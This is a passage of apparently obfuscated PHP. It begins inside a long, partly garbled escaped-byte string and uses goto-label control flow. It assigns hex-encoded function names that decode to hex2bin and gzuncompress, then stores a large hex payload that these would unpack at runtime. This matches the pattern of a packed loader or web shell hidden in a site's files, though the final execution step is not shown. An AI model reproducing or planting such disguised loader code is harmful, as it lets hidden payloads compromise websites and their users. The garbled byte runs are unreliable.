x3f\357\xbf\275\x6c\x51\x16\xef\277\275\x3f\xef\xbf\xbd\xef\277\xbd\x3f\357\277\275\100\xef\277\275\x3f\357\xbf\xbd\357\xbf\xbd\x3f\357\xbf\xbd\41\67\xef\277\xbd\x3f\357\xbf\xbd\357\277\xbd\x3f\xef\xbf\275\x46\357\xbf\275\x3f\xef\277\275\xef\277\xbd\77\357\277\xbd\x20\357\277\275\77\357\xbf\xbd\x5d\357\277\275\77\357\277\275\x73\31\132\x20\102\357\277\275\x3f\357\277\275\66\62\162\xef\xbf\xbd\x3f\xef\277\275\x76\357\277\xbd\77\357\xbf\xbd\172\x7e\357\277\xbd\x3f\357\277\275\37\113\x1d\27\357\xbf\xbd\x3f\357\xbf\275\x37\357\xbf\275\x3f\xef\277\xbd\x63\xef\277\xbd\x3f\357\xbf\275\357\xbf\xbd\x3f\xef\277\275\x35\xef\xbf\275\x3f\357\277\275\56\357\277\275\77\xef\xbf\xbd\357\xbf\275\77\357\xbf\275\357\277\xbd\x3f\357\xbf\275\x3f\357\277\275\161\xe\46\xef\277\275\x3f\xef\xbf\xbd\132\xef\xbf\xbd\77\xef\277\xbd\x64\xef\277\xbd\x3f\xef\xbf\xbd\74\xef\xbf\xbd\x3f\357\xbf\275\x19\x6b\x6b\357\277\xbd\77\357\xbf\275\357\xbf\xbd\x3f\357\xbf\xbd\357\xbf\xbd\x3f\xef\xbf\xbd\x54\35\6\46\x38\357\277\275\x3f\357\xbf\xbd\174\357\xbf\xbd\x3f\xef\xbf\xbd\xef\277\275\x3f\357\xbf\275\357\xbf\xbd\77\357\277\xbd\111\357\277\275\77\xef\xbf\275\xef\xbf\xbd\77\357\277\xbd\x3\xef\277\275\77\357\xbf\xbd\357\xbf\xbd\x3f\xef\277\275\40\x57\x73\x7d\357\xbf\275\x3f\xef\277\275\xef\277\xbd\77\357\xbf\xbd\357\277\275\x3f\357\277\xbd\103\xef\277\xbd\357\xbf\275\x3f\xef\277\xbd\143\161\xf\156\111\357\277\xbd\357\xbf\275\x3f\357\xbf\275\x5f\357\xbf\xbd\x3f\357\xbf\275\xef\277\275\x3f\357\xbf\xbd\xef\277\xbd\x3f\357\277\xbd\x33\23\xef\277\xbd\x3f\xef\277\275\xef\xbf\xbd\x3f\357\xbf\275\174\x4e\x15\xef\277\xbd\77\357\277\275\x2d\x79\54\xef\277\275\77\357\277\xbd\xef\277\xbd\x3f\357\277\275\151\357\277\275\77\xef\xbf\xbd\xef\xbf\xbd\x3f\357\xbf\xbd\357\xbf\275\77\357\277\xbd\105\xef\277\275\x5f\357\277\275\x3f\357\xbf\275\x5c\x36\x30\x6\357\277\xbd\x3f\357\xbf\xbd\357\277\xbd\77\xef\277\275\x1\357\277\275\x3f\xef\277\xbd\100\xef\277\xbd\x3f\357\xbf\275\xef\xbf\275\77\xef\xbf\xbd\x36\357\277\xbd\77\357\277\275\357\xbf\275\x3f\357\277\xbd\xef\xbf\xbd\77\xef\xbf\xbd\x6\xef\xbf\275\x3f\357\xbf\275\104\x40\x44\104\x4\104\100\x44\x44\4\104\100\104\104\x4\104\100\x44\104\x4\x44\x40\104\104\5\x63\357\xbf\275\x3f\xef\xbf\xbd\113\x4e\66\x36\x3c\xef\277\xbd\77\xef\277\275\x63\xef\277\xbd\x3f\xef\xbf\xbd\2\357\277\xbd\x3f\xef\277\275\66\x34\x3d\25\162\xef\xbf\xbd\x3f\357\xbf\xbd\357\xbf\275\77\xef\277\275\357\xbf\xbd\x3f\xef\xbf\275\357\xbf\275\x3f\357\277\275\xef\277\275\77\357\xbf\xbd\x20\77\x3f\x4\x30\xef\277\275\77\xef\xbf\xbd\xef\277\xbd\x3f\357\xbf\275\150\xef\277\xbd\77\xef\277\275\xef\277\xbd\x3f\357\xbf\xbd\xef\xbf\275\77\xef\277\275\164\x26\50\xef\277\xbd\77\xef\xbf\xbd\150\156\142\x5b\x1b\xef\277\xbd\x3f\357\277\275\40\77\357\277\275\x3f\xef\277\275\xef\xbf\xbd\77\xef\277\xbd\136\xef\277\275\x3f\xef\xbf\xbd\xef\277\275\x3f\357\277\275\134\xef\xbf\xbd\x3f\xef\277\275\357\277\xbd\x3f\357\277\275\x3f\357\277\275\174\xef\xbf\275\x3f\xef\277\275\54\357\xbf\xbd\77\357\277\275\x1\57\150\xef\277\xbd\77\xef\277\xbd\134\xef\xbf\275\x3f\xef\xbf\275\xef\277\xbd\77\xef\xbf\275\122\357\277\275\x3f\357\277\xbd\31\xef\xbf\xbd\77\xef\277\xbd\65\357\277\xbd\x3f\357\xbf\xbd\77\x20\357\xbf\xbd\x3f\xef\277\275\60\xef\xbf\xbd\x3f\357\277\xbd\41\327\246\x55\xef\xbf\xbd\33\55\357\277\xbd\x3f\xef\xbf\xbd\357\277\xbd\77\357\277\275\357\xbf\xbd\77\xef\xbf\xbd\357\277\xbd\x3f\357\xbf\xbd\x47\xef\277\xbd\77\357\xbf\xbd\357\xbf\xbd\x3f\357\277\275\xef\xbf\275\77\357\277\275\xef\xbf\xbd\x3f\xef\xbf\xbd\x55\xef\xbf\275\357\277\275\77\xef\xbf\275\357\xbf\275\x3f\xef\277\xbd\121\xef\xbf\275\77\xef\277\xbd\172\101\xef\277\xbd\x3f\xef\277\275\x1e\x13\xef\277\275\77\357\xbf\xbd\xef\277\xbd\x3f\357\xbf\275\x31\xef\277\275\77\xef\277\275\357\277\xbd\77\357\xbf\275\357\xbf\275\x3f\xef\xbf\xbd\357\xbf\275\x3f\xef\277\275\21\357\xbf\xbd\77\357\xbf\xbd\126\357\277\xbd\77\357\277\275\32\357\xbf\xbd\77\xef\277\275\xef\xbf\275\77\357\277\275\x20\357\277\275\77\357\xbf\275\72\122\xef\277\xbd\x3f\357\xbf\xbd\xef\277\xbd\77\357\xbf\xbd\xef\277\xbd\77\357\277\275\140\357\277\275\x3f\xef\xbf\275\44\357\xbf\xbd\77\357\277\xbd\xef\277\275\77\357\xbf\275\151\153\33\xef\277\xbd\77\xef\277\xbd\357\277\275\77\357\xbf\xbd\110\xef\xbf\xbd\x3f\xef\277\xbd\xef\277\xbd\77\xef\277\xbd\357\277\275\x3f\357\xbf\xbd\xef\xbf\xbd\77\357\xbf\xbd\x44\x34\357\xbf\xbd\x3f\xef\277\275\357\xbf\xbd\77\357\277\xbd\357\277\xbd\x3f\357\xbf\xbd\357\xbf\xbd\x3f\357\xbf\275\357\xbf\xbd\77\357\xbf\275\x23\x64\153\xef\277\xbd\77\357\277\275\357\277\275\77\357\xbf\xbd\xef\277\275\77\xef\xbf\275\xef\xbf\275\x3f\xef\277\275\x1e\xef\277\275\77\xef\xbf\xbd\x20\x68\357\277\xbd\77\357\277\xbd\x7d\16\xef\277\275\x3f\357\277\xbd\357\xbf\xbd\77\xef\xbf\275\xef\277\xbd\77\357\277\xbd\357\277\xbd\77\xef\xbf\275\x16\x16\x37\xef\xbf\275\77\357\xbf\275\xef\277\xbd\x3f\357\277\xbd\xef\277\275\77\357\xbf\xbd\x77\45\xef\xbf\275\77\357\xbf\xbd\xef\277\275\x3f\357\277\275\357\xbf\275\x3f\xef\xbf\xbd\xef\277\xbd\77\357\277\xbd\357\xbf\xbd\x3f\xef\xbf\275\177\357\277\275\x3f\357\xbf\275\xef\277\xbd\77\357\277\275\x2a\157\23\70\167\107\357\277\275\x3f\xef\xbf\xbd\32\x4c\x79\143\165\x1\124\357\xbf\xbd\x3f\xef\xbf\xbd\x2e\357\xbf\xbd\77\357\277\xbd\xef\xbf\275\x3f\xef\xbf\xbd\357\xbf\275\77\357\277\275\x55\xef\277\xbd\x37\357\xbf\275\x3f\xef\277\xbd\x11\xef\xbf\xbd\77\xef\xbf\275\x49\xef\xbf\275\x3f\xef\277\275\xef\277\xbd\77\xef\xbf\275\x75\x5e\357\xbf\xbd\77\357\277\xbd\xef\xbf\275\77\xef\277\275\xef\xbf\xbd\77\357\xbf\275\x29\xef\277\xbd\77\xef\xbf\xbd\357\277\xbd\x3f\xef\xbf\275\57\x63\xef\277\275\x3f\xef\277\xbd\54\x73\357\277\275\77\xef\277\xbd\x1d\x4e\x71\357\xbf\275\x3f\357\xbf\275\x55\77\xef\xbf\xbd\77\xef\277\xbd\x3b\357\xbf\275\x3f\357\277\xbd\xef\xbf\275\77\xef\xbf\xbd\77\357\277\275\131\110\x32\357\xbf\xbd\77\xef\277\xbd\xef\xbf\xbd\x3f\xef\xbf\275\357\xbf\xbd\x3f\357\xbf\xbd\x2e\65\102\xef\xbf\xbd\x3f\357\277\275\xef\xbf\xbd\x3f\357\277\275\xef\277\275\77\xef\xbf\xbd\104\104\4\x44\x40\104\104\x4\104\x40\x44\x44\x4\x44\x40\104\x44\4\x44\x40\104\104\4\104\100\x56\174\x18\xf\xef\xbf\275\x3f\xef\277\275\x61\x1a\xef\xbf\275\77\xef\xbf\xbd\152\173\67\x63\xef\xbf\275\x3f\xef\277\275\357\xbf\275\77\357\xbf\275\x58\357\277\275\77\xef\xbf\xbd\x46\x5c\xef\xbf\275\77\357\xbf\xbd\x33\x4d\165\x41\327\xbe\x68\142\357\277\xbd\77\xef\xbf\xbd\x20\357\277\275\x3f\357\277\275\x11\357\xbf\xbd\77\xef\277\xbd\1\x6e\xef\xbf\xbd\x3f\357\xbf\275\357\xbf\xbd\x3f\xef\277\275\106\357\277\xbd\x3f\357\277\xbd\357\277\275\x3f\357\277\xbd\357\xbf\275\x3f\357\xbf\xbd\357\277\275\x3f\357\xbf\xbd\357\xbf\275\77\xef\277\275\xef\xbf\275\77\xef\277\xbd\x20\357\xbf\275\x3f\357\277\xbd\x1c\357\xbf\275\x3f\357\xbf\xbd\70\xef\277\275\77\357\xbf\275\50\xef\277\275\77\xef\277\275\357\277\xbd\77\357\277\xbd\x65\xef\277\275\77\xef\xbf\xbd\357\277\275\77\357\277\275\xef\xbf\275\x3f\xef\277\275\177\xef\xbf\xbd\77\357\xbf\xbd\120\160\357\277\275\77\357\xbf\275\134\x22\x47\xef\277\275\77\xef\xbf\275\x60\163\357\xbf\275\x3f\357\277\275\357\xbf\xbd\77\xef\xbf\xbd\x6d\xef\277\xbd\x3f\xef\277\275\xef\277\275\77\xef\xbf\xbd\x3f\xef\xbf\xbd\x61\x57\xef\xbf\xbd\77\xef\xbf\275\x4b\xef\277\275\77\xef\xbf\xbd\357\277\xbd\77\xef\277\275\117\357\277\275\77\xef\277\275\xef\277\275\77\xef\277\275\xe\357\xbf\275\77\xef\277\275\xef\277\xbd\x3f\xef\277\xbd\x7c\x3b\145\151\357\xbf\xbd\77\357\277\275\357\277\xbd\77\357\xbf\275\xef\xbf\275\x3f\xef\xbf\xbd\xef\277\275\77\xef\277\xbd\77\xef\277\275\xef\xbf\275\x3f\xef\277\xbd\3\133\xef\xbf\275\x3f\xef\xbf\275\x71\xef\277\xbd\x3f\xef\xbf\275\xef\xbf\275\77\xef\xbf\xbd\x22\73\x18\141\357\xbf\275\77\357\xbf\xbd\357\xbf\275\x3f\357\xbf\xbd\61\xef\xbf\xbd\77\xef\xbf\275\357\xbf\xbd\77\357\xbf\xbd\xef\xbf\xbd\x3f\357\xbf\xbd\357\xbf\xbd\77\357\277\275\131\xef\277\275\x3f\xef\xbf\275\107\357\xbf\275\77\357\xbf\275\127\x2f\357\xbf\xbd\77\xef\277\xbd\77\357\277\275\357\xbf\275\x3f\357\277\275\46\357\277\xbd\77\357\xbf\275\74\xef\277\xbd\x3f\357\277\275\xef\xbf\xbd\77\357\xbf\xbd\357\277\275\77\357\277\275\77\xef\277\xbd\xef\xbf\xbd\77\357\277\xbd\x48\47\x71\357\xbf\275\77\357\277\xbd\x6d\xef\xbf\xbd\77\xef\277\xbd\xef\277\xbd\x3f\357\xbf\xbd\xef\xbf\275\x3f\357\277\xbd\x29\xef\xbf\275\x3f\xef\277\275\130\x2b\21\41\x16\357\xbf\xbd\77\357\277\275\357\xbf\275\x3f\357\xbf\275\357\277\xbd\77\xef\xbf\xbd\75\357\xbf\xbd\77\357\xbf\xbd\155\357\xbf\275\77\xef\277\275\x55\x3f\x3f\xef\277\275\357\277\xbd\20\x7e\x36\141\x5e\x58\xef\xbf\275\x3f\357\277\275\51\xef\xbf\275\77\xef\277\xbd\x2\xef\xbf\xbd\x3f\357\xbf\xbd\357\277\xbd\77\357\277\275\54\xef\277\275\x3f\xef\xbf\xbd\x3e\43\x26\66\107\357\xbf\275\x3f\357\xbf\275\357\277\275\x3f\xef\xbf\275\357\xbf\xbd\x3f\xef\277\xbd\131\x3\xef\xbf\xbd\77\xef\277\275\x1f\xef\xbf\275\77\357\xbf\275\x7b\357\xbf\xbd\77\357\xbf\xbd\x4\357\xbf\275\x3f\357\xbf\xbd\357\277\xbd\x3f\xef\277\xbd\x2\357\277\275\77\xef\xbf\275\x22\2\x22\40\x22\x22\2\x22\x20\x22\x22\x2\x22\40\x22\x22\2\x22\40\x22\x22\x2\42\x20\x22\x22\x2\xef\277\xbd\x3f\357\277\275\xef\xbf\275\x3f\xef\xbf\xbd\141\x10\x74\x5c\x2f\xef\277\xbd\77\357\xbf\275\141\357\xbf\xbd\x3f\xef\277\275\x38\40\xef\xbf\xbd\x3f\357\xbf\xbd\33\171\160\45\357\277\xbd\77\357\xbf\xbd\x6c\x68\154\23\xef\xbf\275\x3f\xef\277\xbd\156\xef\xbf\275\x3f\xef\xbf\xbd\357\277\xbd\x3f\xef\xbf\275\xef\277\275\77\357\xbf\275\357\xbf\275\x3f\357\xbf\275\x29\357\277\275\77\xef\xbf\275\357\277\275\77\357\xbf\xbd\1\xef\277\275\x3f\357\277\xbd\x69\xef\xbf\xbd\77\357\xbf\xbd\x74\357\xbf\275\77\xef\xbf\xbd\xef\xbf\xbd\x3f\357\xbf\xbd\102\xef\277\xbd\77\357\xbf\xbd\10\357\277\275\77\357\277\xbd\xef\277\275\x3f\357\277\275\xef\277\275\x3f\357\xbf\xbd\357\xbf\xbd\77\357\277\xbd\10\xef\277\xbd\77\357\277\275\xef\277\275\77\357\277\xbd\357\xbf\xbd\77\xef\277\275\xef\277\275\x3f\xef\277\xbd\10\357\xbf\xbd\x3f\357\277\275\357\xbf\275\77\357\xbf\xbd\357\xbf\xbd\x3f\357\xbf\275\xef\277\xbd\77\357\277\275\x3f\357\xbf\275\77\357\277\xbd\xef\xbf\xbd\77\357\277\xbd"; goto WvJN1; K6n7u: $nX5gU = "\150\145\170\x32\x62\x69\156"; goto vqTth; VA8ho: goto ay2JG; goto pk35o; WvJN1: goto SzXBH; goto hSlZ8; r0yUE: SzXBH: goto fmy1J; zVncH: HDaJ1: goto w_iMC; IjvKH: goto I_DFw; goto IILi2; w_iMC: $azpZ6 = "\x67\172\x75\156\x63\157\155\160\x72\145\163\163"; goto YOi33; IfZ46: ay2JG: goto Z8mPd; YOi33: goto g30zr; goto r0yUE; vm_5q: $RDJOr = "\x37\x38\x64\x61\x61\65\146\x64\145\x39\x61\145\x38\64\x34\x30\x39\x61\x32\65\60\x38\146\x65\x31\x66\66\71\x64\x65\145\61\67\66\x61\x39\65\x61\61\x39\x33\71\x36\x34\x39\65\60\x33\143\145\141\141\145\x63\145\x61\61\145\67\60\x66\x36\x31\x64\71\143\142\x64\x62\142\61\64\x36\x32\x64\x66\x66\67\x39\x64\x35\61\142\146\146\142\x37\60\66\63\x63\71\x38\x38\143\x38\x63\141\x65\x39\x31\71\66\71\141\64\x61\x62\145\142\70\145\66\61\x31\70\x36\66\144\x66\x37\x32\x62\145\x37\63\67\60\x31\143\x66\x66\x39\x66\60\x64\x38\66\x66\x62\62\x66\x65\60\67\146\70\61\146\x65\x39\67\146\x66\x36\144\62\143\143\67\71\x66\x61\x34\70\x64\71\66\145\x35\143\x37\x61\142\x64\62\71\x66\146\x66\x64\67\143\x66\x34\146\x62\145\146\x35\143\x39\x35\x61\60\144\146\144\143\146\61\146\x66\146\x39\70\60\x63\x66\x64\x62\x32\x63\x65\x35\142\x62\62\146\x65\x65\x31\71\146\67\x66\146\67\146\143\x66\143\145\67\71\63\x63\60\x37\x65\146\x65\144\142\143\x66\x37\x66\65\x65\143\142\66\141\146\71\62\146\x66\x66\66\x62\61\x63\62\65\x34\x64\144\66\141\67\67\x66\146\x38\143\142\66\x36\63\x32\x61\64\x64\71\x33\146\146\x66\x65\x62\146\146\144\60\x61\142\x35\144\146\x65\x64\x61\x61\x31\x61\144\x65\62\63\146\x66\143\145\x65\x66\x62\x65\x37\146\x66\x61\60\144\67\x31\146\145\x66\x66\x35\x63\x66\x66\142\x37\x65\x37\67\65\65\146\71\71\x66\144\146\146\x66\x65\71\x39\143\x66\x66\67\x36\x62\66\x61\144\66\x61\144\x33\x64\x66\60\63\71\x65\63\144\x66\x66\146\x62\146\142\142\146\x66\x66\145\142\144\x66\x65\x64\61\x61\143\x66\x62\146\142\x36\x63\x33\x66\x66\144\x30\67\145\66\x32\x63\x38\x35\146\67\67\70\60\146\x66\142\60\x65\x33\70\146\145\x33\63\143\62\64\x64\71\142\62\146\143\x65\61\62\146\x66\142\x66\145\145\65\143\146\x39\144\x61\60\x66\x66\146\x65\x61\67\x64\x33\146\x66\x39\146\x37\146\146\x61\146\x62\x37\x62\x34\x33\146\x63\x35\x62\x66\67\62\x36\142\142\x39\145\142\145\144\x64\142\60\x36\67\x37\146\x33\61\x63\70\x35\x66\143\x36\x35\x62\144\66\143\67\x31\x36\x62\146\x65\x37\x37\141\x33\x61\x66\x63\145\142\144\146\144\x61\67\146\63\x62\x66\145\142\66\146\x65\x62\x65\x66\145\x35\x64\x37\x33\x33\x32\143\143\144\x39\146\146\70\65\61\x39\x65\67\142\146\x39\x38\x66\x31\x33\x66\x65\x61\146\143\x32\67\61\142\146\x65\146\x66\144\x32\146\x31\70\x66\x66\67\x66\71\70\67\x62\x66\61\x61\146\63\x66\61\145\x31\63\x38\x32\x63\x37\x66\67\x66\144\x63\142\x66\x66\143\145\x33\143\x63\x66\x66\146\71\145\x37\67\x66\x66\x61\x36\x66\x66\146\x65\x64\62\67\x38\x66\x64\x61\145\x35\x32\x66\145\142\146\141\63\144\145\141\x37\x66\146\x61\67\142\x63\63\x66\146\x66\x33\x63\146\x64\x66\71\71\x61\x66\x63\142\142\x61\66\61\142\x65\146\145\x66\60\66\146\144\66\146\x66\71\x37\x62\x66\x33\x33\146\x38\63\146\146\x66\x38\63\x39\x64\67\146\142\x64\x66\141\145\146\x36\66\146\142\63\146\65\70\x66\67\141\x66\141\63\63\x64\143\61\142\x36\143\x65\64\x33\x66\142\60\143\x66\66\x32\143\x37\62\70\145\x65\x36\x65\142\x32\x66\x32\66\144\x65\x61\63\67\66\146\x62\142\142\70\65\x66\144\x62\x39\146\142\x65\63\145\71\146\146\x66\x61\70\x66\60\x64\144\60\x62\146\66\146\x37\70\146\x66\x66\142\70\66\x33\146\143\67\x63\x30\144\x66\x63\x36\x66\142\144\x33\x39\x62\146\146\145\x38\x62\x63\x66\x66\x66\141\145\67\x32\71\146\x65\x63\144\146\146\64\x39\71\64\71\64\64\146\x63\146\x35\146\x33\x37\x33\x65\144\144\61\x65\71\142\141\65\x66\146\146\62\x32\x37\65\67\x66\146\x36\65\x38\66\x63\146\143\145\x33\x66\x37\x39\146\x66\142\61\67\x33\71\142\x66\x35\x37\x66\146\x38\65\63\x38\67\67\146\x66\145\x30\x31\x66\145\x36\144\x66\x62\x62\67\145\67\145\146\x61\x39\70\x66\142\62\66\x61\142\x33\63\x66\x66\143\67\x64\x65\142\143\x66\x66\x66\x66\x32\x39\x37\141\x33\146\146\x31\141\145\x62\67\146\x61\x63\x66\x61\x36\x34\x65\x38\67\x65\x61\67\63\67\143\x63\x65\71\x39\146\64\x37\x66\x61\144\x66\146\x66\x36\141\143\143\x33\64\x38\x62\x62\67\x65\x32\142\x66\x66\x66\x66\x33\x63\146\67\x66\x66\x39\x66\63\x62\x65\x65\67\x66\70\x37\146\x62\x66\145\142\x63\146\142\x36\146\x66\x30\x66\60\x65\67\x61\143\66\64\x62\x63\x61\x66\71\60\146\146\146\x33\x36\x66\x63\x66\146\146\143\x66\x33\x30\67\x30\143\x66\x39\67\x66\x32\60\x66\146\x66\x63\x39\x37\62\x33\71\x65\141\61\67\145\x66\145\145\142\x37\x66\146\x62\60\146\x38\146\146\x63\60\67\67\67\x66\x65\x61\71\x30\71\60\60\x66\145\x65\62\x63\66\71\146\63\71\x35\142\x62\67\142\71\146\x66\146\x33\x36\x31\x37\x66\142\61\x64\71\144\146\x39\142\x65\144\64\x66\x62\61\x66\x61\61\x37\145\142\x66\x65\143\x35\65\x32\x37\146\145\x63\70\x36\67\x34\66\142\146\x66\x33\61\71\x65\x66\x66\x63\x65\x39\x35\142\x66\x35\142\x65\x66\67\146\x64\x38\x38\x32\146\x65\66\x31\60\x62\x66\143\70\x37\x32\x64\x65\64\143\x66\146\x65\146\143\144\142\x39\x38\x66\146\143\x66\142\146\x62\145\x66\146\x64\142\66\71\x66\x66\x66\65\145\146\141\67\146\x39\x65\67\x39\144\x66\146\x64\145\142\x62\x62\x66\60\60\146\65\x66\146\66\144\71\x36\x63\142\x37\63\x62\62\146\x66\146\x61\142\x37\60\x64\145\x38\x65\x66\x33\67\144\x65\x37\146\142\x66\60\61\146\146\x66\144\60\66\x66\x38\146\x66\144\x37\x30\64\146\146\62\145\146\145\67\145\x37\x33\x66\71\x31\x66\146\60\x32\66\145\x62\142\66\x62\x66\64\x62\146\x35\x62\x66\x38\64\145\67\x64\x66\63\x30\x65\67\x35\x66\x37\x65\x66\x65\x32\146\x37\62\x66\x64\x35\146\x66\146\63\x66\70\144\146\63\63\67\x61\x34\146\x65\66\144\146\146\x38\x37\71\71\146\144\x61\x64\146\x39\63\146\x39\x38\144\x63\x39\x33\x65\x33\67\142\x33\66\x66\x66\63\x35\x35\142\x61\142\x65\143\67\70\x38\x36\x63\143\71\145\145\x34\146\141\x37\x33\x66\x33\144\146\60\x66\x66\63\x62\x62\146\63\x37\x66\x31\70\x65\x30\144\146\146\60\145\x66\x38\x66\142\146\x36\65\66\70\x66\144\x62\67\x39\x31\x66\145\x30\x37\x32\146\63\x63\144\x33\70\x66\x64\142\145\143\x65\146\x38\62\145\60\x32\x66\x30\144\x63\70\x62\x66\x36\x66\x37\70\146\146\x66\x62\x30\66\145\70\144\146\x33\x37\x63\60\146\x66\x62\145\60\x31\146\x64\x65\x66\x66\x66\x38\x31\62\63\146\145\146\x30\71\146\x66\145\70\146\146\71\x66\146\x65\70\146\146\x64\x33\142\x66\146\x63\146\143\x61\67\146\x66\x66\x34\71\x62\x66\66\x37\x66\71\144\x64\x65\142\146\70\65\146\141\x31\x65\143\x64\63\146\146\146\63\x39\x34\141\x37\x65\x34\142\143\x33\x62\146\x66\x65\66\x35\x65\x62\x63\x66\62\71\146\62\143\x63\x31\x39\x66\143\x64\x37\67\146\x65\142\x64\61\62\x65\143\x66\67\66\x33\x34\143\x66\144\x31\x66\x35\70\x37\x37\x66\65\x61\x62\x33\67\146\146\141\71\67\x39\x66\x37\x66\141\141\146\141\x64\x66\146\x66\66\144\x66\x34\146\x62\x33\x66\146\146\146\x64\65\x37\144\143\146\x66\x66\64\143\x66\x37\146\61\x64\62\x32\63\144\x66\146\x64\x36\x37\x64\x66\70\65\x33\143\x37\66\x34\143\x65\x66\145\x64\64\67\65\x63\144\146\x65\146\70\x35\x38\x65\x64\x34\x66\62\144\x36\x62\146\x35\142\67\60\x33\x39\145\65\x63\146\70\144\x62\61\61\x34\x66\61\65\146\145\x65\144\71\x30\146\145\x65\x39\63\x63\x37\61\x62\x34\x66\x63\x65\x39\61\x35\64\63\x66\145\x66\70\x66\x62\x39\62\x66\x64\145\144\x39\x38\x33\146\64\x33\145\x32\144\146\60\x65\141\x62\146\x65\x64\x34\66\146\64\144\x38\66\144\146\71\67\x33\146\x31\x66\63\64\63\x34\x37\x66\x65\x62\x66\145\66\67\62\x62\146\x64\x61\x64\x66\142\x66\x32\x64\x62\x36\61\x66\143\x64\142\x32\x32\146\x65\x33\70\x66\146\x66\x39\146\70\x66\x39\x34\146\71\63\x66\x62\146\63\67\x39\146\145\142\x61\x66\143\142\x66\x64\x34\141\x35\x37\146\x66\x61\x63\70\x32\x38\144\142\71\145\x31\x63\x38\x39\x35\64\63\143\62\61\x63\x39\64\x30\x36\x61\64\60\62\x30\x38\64\x32\x33\x64\x61\x61\x62\70\65\x65\x62\x62\145\65\x30\142\x36\64\144\63\x32\67\x38\64\x33\65\x39\x66\144\142\145\x33\x32\142\x39\62\70\x35\x63\67\x64\x34\63\141\145\x62\x66\63\x36\x63\141\67\144\x63\x32\x30\62\x38\x39\141\x35\x63\145\141\143\64\x35\63\x35\141\70\65\x34\x35\144\142\x34\61\65\x38\142\x61\x63\67\64\66\146\64\65\x63\67\71\x66\x31\146\x37\145\71\x30\71\143\x36\146\141\x37\x65\x61\144\141\x34\67\x66\x32\144\67\70\x30\x34\x31\143\x61\x66\x62\63\145\62\x34\x38\x33\66\141\66\66\141\x64\71\64\144\x30\63\x31\x61\61\x35\x39\143\x35\62\x31\x30\x31\66\x30\142\144\60\x30\145\146\x35\142\x37\66\145\x32\71\x38\66\x37\x31\x31\63\60\60\62\66\x32\62\x38\x30\63\x38\62\62\x36\61\x32\60\x30\x64\x34\x64\142\146\x64\x35\x34\x34\145\x36\70\x61\63\61\x36\x64\145\x65\x37\x36\145\x37\x62\63\x64\x66\x65\146\71\x36\x31\61\x31\62\142\x32\x34\145\145\x62\144\x35\x33\x37\62\146\144\x33\141\x36\143\x33\67\x36\x64\x34\70\63\x34\x64\x32\x65\x34\x30\66\66\70\x62\x38\61\142\70\x65\146\x36\64\144\x37\142\x33\x37\x64\x36\144\70\67\146\x33\x63\67\64\x65\62\66\70\x63\67\x35\60\141\x65\146\60\145\x64\x35\x61\145\x61\141\70\67\x38\64\x62\71\146\146\x38\60\x61\142\x31\70\x33\141\x64\x35\63\142\145\65\67\x38\142\x63\x33\64\x39\141\x64\x37\70\145\x35\61\x65\61\60\x35\145\63\146\63\x66\60\141\65\x33\x33\141\x65\67\142\x35\x32\x62\x63\x35\62\x37\61\x64\x35\x34\70\x37\x33\x35\67\143\x33\66\x33\x33\65\x32\64\142\x34\64\141\x35\x37\62\146\x32\142\x35\70\142\71\x65\x30\x30\146\x33\71\142\x37\x62\x39\143\x64\x33\x61\x30\146\x61\x33\64\63\63\63\x63\61\66\65\x39\x31\62\62\x34\66\x64\x32\x37\x35\63\141\60\x32\x34\146\141\x32\143\64\x39\62\x30\x31\x34\x64\x64\143\x66\63\70\x63\x30\x33\143\142\x34\x30\x39\143\141\x39\61\x31\x36\146\145\146\145\x66\143\63\x38\x66\60\x63\x35\x35\x66\62\x65\67\67\61\62\x38\x61\62\60\x39\146\60\x39\71\143\61\67\143\71\x38\71\x66\142\x39\71\x31\61\66\66\64\70\x63\x38\71\x34\x62\x35\x63\x32\71\65\x65\142\x65\x38\71\x65\x38\144\x66\60\x30\x65\x61\143\146\x36\x35\x39\141\66\141\x61\x30\146\61\x31\x31\67\x37\x66\x33\x63\x62\x32\145\x62\x39\x30\x63\x63\x66\x61\x31\141\x64\x35\62\143\145\64\x31\x30\67\x37\x36\x38\x33\x33\143\62\66\x34\x33\x38\x62\x31\x66\x61\x38\x33\146\60\x66\x33\x31\x33\x38\x62\x32\x61\x30\62\x31\144\143\x64\64\60\64\x63\x64\62\142\141\145\145\62\x35\x64\143\71\x36\142\61\x32\65\x37\x64\60\67\x33\x38\61\x63\70\x35\64\64\x36\x34\61\142\x38\64\x38\71\x31\64\x61\146\71\67\x65\67\62\146\64\x63\x34\63\x36\x65\x62\x65\x61\x65\x39\65\x38\x32\141\62\63\71\66\71\x61\x64\142\65\141\144\x61\x66\66\x64\61\x32\x31\62\x37\x33\x63\66\146\x61\67\61\145\x61\x33\60\x30\71\143\x62\x65\x35\64\x36\x65\65\x33\67\70\x66\66\x37\67\x30\x61\146\63\x39\x34\60\65\x61\x35\x34\x62\67\x31\62\x64\66\x64\x34\141\143\146\x64\146\62\x62\x39\142\60\146\x36\62\63\65\x63\144\67\63\71\x34\146\x39\145\x35\67\x62\66\146\71\x37\x32\146\143\70\62\63\x39\64\66\143\x61\143\x64\66\60\145\63\60\x37\x31\x30\x32\x37\142\x62\65\x35\61\66\65\x38\64\x30\x65\x32\x61\67\x36\x63\141\62\x30\x32\x31\60\70\x39\142\61\142\60\67\x37\x64\x63\x64\x34\142\x30\61\61\x36\71\x65\143\71\146\144\65\x66\x64\x66\x63\x37\x38\x66\x30\142\141\145\67\146\66\141\x38\63\x30\x30\61\x65\x62\142\62\x36\x36\63\x66\x33\65\x35\61\x39\x34\x64\x65\70\60\x32\70\x35\x35\60\x30\x63\146\145\142\x66\x38\x30\x63\146\142\x32\x36\x39\x35\65\143\70\x37\x37\64\x63\x62\x64\141\144\x34\144\x66\x64\71\145\145\144\x39\145\146\x31\x65\x65\60\71\64\x62\145\x32\x39\x33\61\142\x32\71\x34\x64\141\x61\63\146\x61\65\145\61\x61\145\x39\x61\66\71\67\x62\x61\141\x37\x61\65\x64\70\x39\70\60\65\146\144\146\63\x66\63\x38\x39\70\x62\60\62\62\x38\142\143\61\66\142\x38\67\61\67\x66\x32\144\x66\x35\60\144\x31\x64\x63\x64\66\x64\x61\67\x30\65\x34\x64\67\66\x64\x38\x63\71\x32\x34\144\146\62\x31\x38\x61\141\65\64\62\x35\x39\x39\61\70\x33\66\x62\x64\67\x35\60\x63\x64\70\x33\x64\x33\65\70\62\65\61\142\60\141\62\62\66\x35\64\61\144\x64\x33\x34\60\145\x38\x37\x38\64\x65\64\146\61\x34\x36\x34\142\x30\x37\63\66\x35\x30\x38\143\146\x63\145\141\x31\x32\64\146\146\64\141\64\143\x61\65\62\141\71\x39\66\x39\60\142\x65\67\x39\144\x31\146\x39\70